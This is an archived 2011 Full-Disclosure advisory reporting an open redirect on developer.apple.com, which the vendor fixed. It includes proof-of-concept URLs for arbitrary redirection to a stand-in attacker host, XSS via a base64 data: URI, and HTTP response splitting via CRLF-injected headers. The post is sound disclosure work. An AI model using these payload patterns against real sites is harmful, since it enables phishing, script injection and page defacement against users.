lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BANLkTimg3rvRnrN_qbz9i0CbzUjG_o7SrA@mail.gmail.com> Date: Fri, 1 Jul 2011 17:09:42 +0800 From: YGN Ethical Hacker Group <lists@...g.net> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Subject: Vulnerabilities in developer.apple.com Vulnerabilities via URL Redirector in developer.apple.com 1. VULNERABILITY DESCRIPTION Arbitrary URL Redirect ====================== POC (Browsers: All) https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page Issue References: OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 601 - http://cwe.mitre.org/data/definitions/601.html Cross Site Scripting(XSS) Via Arbitrary URL Redirect ==================================================== POC (Browsers: Safari, Opera): https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D Issue References: OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 79 - http://cwe.mitre.org/data/definitions/79.html HTTP Response Splitting(HRS) Via Arbitrary URL Redirect ======================================================== https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!-- Issue References: CWE 113 - http://cwe.mitre.org/data/definitions/113.html Demo: http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/ 2. VENDOR Apple Inc http://www.apple.com 3. VULNERABILITY STATUS FIXED 4. DISCLOSURE TIME-LINE 2011-04-25: reported vendor 2011-04-27: vendor replied "Thank you for forwarding this issue to us. We take any report of a potential security issue very seriously." 2011-06-29: vendor replied vulnerability was fixed 2011-07-01: vulnerability was disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs #yehg [2011-07-01] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/